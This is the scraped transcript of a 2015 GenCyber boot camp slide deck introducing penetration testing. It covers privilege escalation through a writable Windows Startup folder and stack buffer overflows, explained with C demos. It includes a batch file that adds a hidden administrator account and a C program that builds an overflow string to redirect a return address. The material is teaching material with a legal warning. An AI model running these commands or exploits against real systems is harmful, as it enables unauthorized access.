Presentation is loading. Please wait.

Presentation is loading. Please wait.

JMU GenCyber Boot Camp Summer, 2015. Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations.

Published byRoss George Modified over 8 years ago

Similar presentations

Presentation on theme: "JMU GenCyber Boot Camp Summer, 2015. Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations."— Presentation transcript:

1 JMU GenCyber Boot Camp Summer, 2015

2 Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations – File permissions Attacking services and applications – Buffer overflows JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 2

3 Reminder – We Don't Teach People to be Attackers It is illegal: – United States Code, Title 18, Section 1030 (and others) – USA Patriot Act, Homeland Security Act, PROTECT Act – www.cybercrime.gov Basically: – Unauthorized access or use of a computer or network system is illegal – Unintentional attacks are illegal too JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 3

4 Privilege Escalation Goal: get instructions executed with higher privileges than you have: – Kernel – Privileged application or service – A setuid program – A privileged user JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 4

5 Privilege Escalation – Example JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 5 Windows host Guest access – Can’t write to: C:\Documents and Settings\Administrator – Can write to: C:\Documents and Settings\All Users\Start Menu\Programs\Startup

6 Privilege Escalation – Example (cont) A simple batch file: net user elvis T!C!B!123 /add net localgroup administrators elvis /add Place this program in C:\Documents and Settings\AllUsers\StartMenu\Programs\Startu p It will be executed by the administrator (with administrator privileges) at the next logon JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 6

7 Privilege Escalation – Demo Demo Note: – Could be noticed by the administrator During logon Recognizing the “elvis” account – Worked because the C:\Documents and Settings\AllUsers\StartMenu\Programs\Startup directory was writeable JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 7

8 File Permissions – Example Windows host Guest access – Can read registry Can see what programs run when users (including admin) log on – Can overwrite a program JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 8

9 File Permissions – Demo Demo Note: – Could be noticed by the administrator During logon – Worked because the C:\Program Files directory was writeable JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 9

10 Buffer Overflows A buffer overflow involves putting more data into a buffer than it has room to hold In some cases, the extra data overwrites other items in memory after the buffer Overflowing a buffer may enable you to change/control the flow of execution of the program JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 10

11 What Does This Program Do? #include void f() { char buf[4]; int *ret; ret = (int *) (buf + 8); (*ret) += 7; } int main() { int x=0; f(); x=1; printf("x=%d\n",x); } JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 11

12 The Stack Segment A program’s stack segment: – Temporary working space for the program – Example: Subroutines int foo(int P1, int P2) /* subroutine “foo” */ { int L1, L2; /* local variables L1 and L2 */ L1 = P1 + P2; return(L1); /* return value */ } int main() /* main program */ { … x = foo(1,2); /* call to subroutine “foo” */ … } JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 12

13 Stack Frames JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 13 Stack main foo Stack frames Low Addresses High Addresses

14 Stack Frames (cont) A stack frame contains the corresponding routine’s: – Parameters – Return address (i.e. next instruction to execute upon completion) – Saved registers – Local variables Many architectures have registers: – SP, the stack pointer, points to the top of the stack – BP, the base pointer, points to a fixed location within the frame Used to reference the procedure’s parameters and local variables JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 14

15 Stack Frames (cont) The main routine calls foo: – foo’s parameters are first pushed onto the stack – The next instruction in main to execute after foo finishes, the return address, is pushed – Control is transferred to foo – foo’s prologue: Save caller’s (main’s) base pointer Set callee’s (foo’s) bp equal to the current sp Increment sp to reserve space on the stack for foo’s local vars (word aligned) – foo’s instructions – foo’s epilogue: Restore saved values and deallocate callee’s (foo’s) stack frame JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 15

16 Stack Frame - Example int foo(int P1, int P2) /* subroutine “foo” */ { int L1, L2; /* local variables L1 and L2 */ L1 = P1 + P2; return(L1); /* return value */ } int main() /* main program */ { … x = foo(1,2); /* call to subroutine “foo” */ … } JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 16

17 Stack Frames – Example (cont) foo’s stack frame after the completion of the prologue: JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 17 stack SP L1main’s bpL2 P1 P2 return address Foo’s BP Low Addresses High Addresses

18 Ex1.c #include void f() { char buf[4]; int *ret; ret = (int *) (buf + 8); (*ret) += 7; } int main() { int x=0; f(); x=1; // This instruction is not being executed. Why? printf("x=%d\n",x); } JMU GenCyber Boot Camp© 2015 JAMES MADISON UNIVERSITY 18

19 The Stack as f() Begins Execution stack main’s bpret Main’s frame return address Low Addresses High Addresses buf[3] buf[2] buf[1] buf[0] 4 4 4 1 1 1 1

20 Ret points to the the return address on the stack ret = (int *) (buf + 8); stack main’s bpret Main’s frame return address Low Addresses High Addresses buf[3] buf[2] buf[1] buf[0] 4 4 4 1 1 1 1 buf buf + 8

21 Ret points to the the return address on the stack (*ret) += 7; stack main’s bpret Main’s frame return address + 7 Low Addresses High Addresses buf[3] buf[2] buf[1] buf[0]

22 Ex1.c (cont) #include void f() { char buf[4]; int *ret; ret = (int *) (buf + 8); (*ret) += 7; } int main() { int x=0; f(); x=1; // This instruction is being skipped because f() increments the return address printf("x=%d\n",x); // This is the next instruction executed after f() }

23 What Does This Program Do? #include int a; char address[100]; void sub1 () { char buf[4]; int *ret = (int *) (buf + 8); a = strtol(address,NULL,16); (*ret) = a; } void sub2 (void) {printf("Opps!\n"); exit(0);} int main() { sprintf(address,"%p",sub2); sub1(); }

24 Ex2.c #include int a; char address[100]; void sub1 () { char buf[4]; int *ret = (int *) (buf + 8); //ret points to the return address a = strtol(address,NULL,16); //a is the address of sub2() (*ret) = a; //put the address of sub2() in the return address } void sub2 (void) {printf("Opps!\n"); exit(0);} int main() { sprintf(address,"%p",sub2); // Get the address of the sub2() function sub1(); // Call sub1() }

25 What Does This Program Do? #include char input[100]; void sub1 () { char buf[10] = ""; // fixed-size buffer strcpy(buf, input);} // copy input into buf whether it fits or not void sub2 (void) {printf("Opps!\n"); exit(0);} int main() { printf("Please enter some input (10 characters max, please):\n"); fgets(input,99,stdin); sub1();}

26 What Can We Make it Do? Run normally –Input “ABC”

27 What Can We Make it Do? Run normally –Input “ABC”

28 What Else Can We Make it Do? Seg fault (overflow the buffer and overwrite ret. address) stack main’s bp Main’s frame return address Low Addresses High Addresses buf[9] … buf[0]

29 Still More We Can Make it Do Execute sub2() –Know the address of sub2() –Enter enough characters get to the return address on the stack (overflow the buffer) –Enter the address of sub2() so that it overwrites the return address Problem #1: What is the address of sub2()? Problem #2: How many characters to enter to get to the return address? Problem #3: How can we “enter” the address of sub2()?

30 make_input.c #include int main(int argc, char**argv) {// construct an overflow string char buf[1005]; if (argc !=3) fprintf(stderr,"Usage: %s [offset] [return address in hex]\n",argv[0]); else { int a, offset = atoi(argv[1]); for (int i=0; i<offset; i++)// write offset A’s buf[i]='A'; a = strtol(argv[2],NULL,16); buf[offset]=a&0xFF; buf[offset+1]=((a&0xFF00)>>8); // write characters of ret. addr buf[offset+2]=((a&0xFF0000)>>16); buf[offset+3]=((a&0xFF000000)>>24); buf[offset+4]='\0'; fprintf(stdout,"%s\n",buf); } }// output the constructed string

31 What Happened? stack main’s bp Main’s frame return address Low Addresses High Addresses buf[9] … buf[0] stack AAAA Main’s frame address of sub2() A … A

32 Summary Elevating privileges –Getting code run in a privileged context Exploiting misconfigurations –File permissions Attacking services and applications –Buffer overflows

Download ppt "JMU GenCyber Boot Camp Summer, 2015. Introduction to Penetration Testing Elevating privileges – Getting code run in a privileged context Exploiting misconfigurations."

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
The University of Adelaide, School of Computer Science

The University of Adelaide, School of Computer Science
Slides revised 3/25/2014 by Patrick Kelley. 2 Procedures Unlike other branching structures (loops, etc.) a Procedure has to return to where it was called.

Slides revised 3/25/2014 by Patrick Kelley. 2 Procedures Unlike other branching structures (loops, etc.) a Procedure has to return to where it was called.
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Procedure Calls Prof. Sirer CS 316 Cornell University.

Procedure Calls Prof. Sirer CS 316 Cornell University.
CPS3340 COMPUTER ARCHITECTURE Fall Semester, 2013 10/17/2013 Lecture 12: Procedures Instructor: Ashraf Yaseen DEPARTMENT OF MATH & COMPUTER SCIENCE CENTRAL.

CPS3340 COMPUTER ARCHITECTURE Fall Semester, /17/2013 Lecture 12: Procedures Instructor: Ashraf Yaseen DEPARTMENT OF MATH & COMPUTER SCIENCE CENTRAL.
Ch. 8 Functions.

Ch. 8 Functions.
Apr. 12, 2000Systems Architecture I1 Systems Architecture I (CS 281-001) Lecture 6: Branching and Procedures in MIPS* Jeremy R. Johnson Wed. Apr. 12, 2000.

Apr. 12, 2000Systems Architecture I1 Systems Architecture I (CS ) Lecture 6: Branching and Procedures in MIPS* Jeremy R. Johnson Wed. Apr. 12, 2000.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
COMP3221: Microprocessors and Embedded Systems Lecture 12: Functions I Lecturer: Hui Wu Session 2, 2005.

COMP3221: Microprocessors and Embedded Systems Lecture 12: Functions I Lecturer: Hui Wu Session 2, 2005.
1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)

1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)
Overview C programming Environment C Global Variables C Local Variables Memory Map for a C Function C Activation Records Example Compilation.

Overview C programming Environment C Global Variables C Local Variables Memory Map for a C Function C Activation Records Example Compilation.
Buffer overflows and various code injection methods Raghunathan Srinivasan CSE 539, 2/2/2011.

Buffer overflows and various code injection methods Raghunathan Srinivasan CSE 539, 2/2/2011.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.

Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.

Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.
CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 20 Jonathan Katz.
Chapter 8 :: Subroutines and Control Abstraction

Chapter 8 :: Subroutines and Control Abstraction
Chapter 7: Runtime Environment –Run time memory organization. We need to use memory to store: –code –static data (global variables) –dynamic data objects.

Chapter 7: Runtime Environment –Run time memory organization. We need to use memory to store: –code –static data (global variables) –dynamic data objects.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Buffer overflows.

Buffer overflows.

Similar presentations

Ads by Google